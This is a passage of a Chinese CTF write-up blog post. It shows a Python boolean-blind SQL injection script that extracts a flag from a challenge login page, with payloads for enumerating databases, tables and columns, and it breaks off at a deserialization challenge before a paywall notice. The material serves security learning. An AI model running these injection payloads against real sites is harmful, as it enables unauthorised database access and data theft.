前言
只有web,misc是我写的,剩下的都是队的师傅写的,我是飞舞,就这样
Web
Query
查看源码有hintlogin.php,然后有显示登录界面

利用万能密码进行登录,有回显

回显是登陆成功利用脚本进行布尔盲注
import requests
import string
url="http://d574c221d2a0f4da.node.nsctf.cn/login.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,999):
print(i)
for j in range(32,128):
# 库名
#s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"
# 表名
#s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"
# 列名
#s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"
s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{
i},1))/**/like/**/{
j},1,0)#"
data={
'username':s,
'password':1
}
r=requests.post(url,data=data)
if "登录成功" in r.text:
flag+=chr(j)
print(flag)
break
运行脚本得出flag

Deserialization
按f12得到hint
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST</

文章详细介绍了多个CTF挑战的解决方案,包括Web安全中的SQL布尔盲注获取flag,PHP反序列化漏洞利用,以及加密解密问题,如RSA和摩斯密码、维吉尼亚密码的破解。此外,还涉及ZIP压缩包的字典爆破和PDF文档的转换处理。
最低0.47元/天 解锁文章
801

被折叠的 条评论
为什么被折叠?



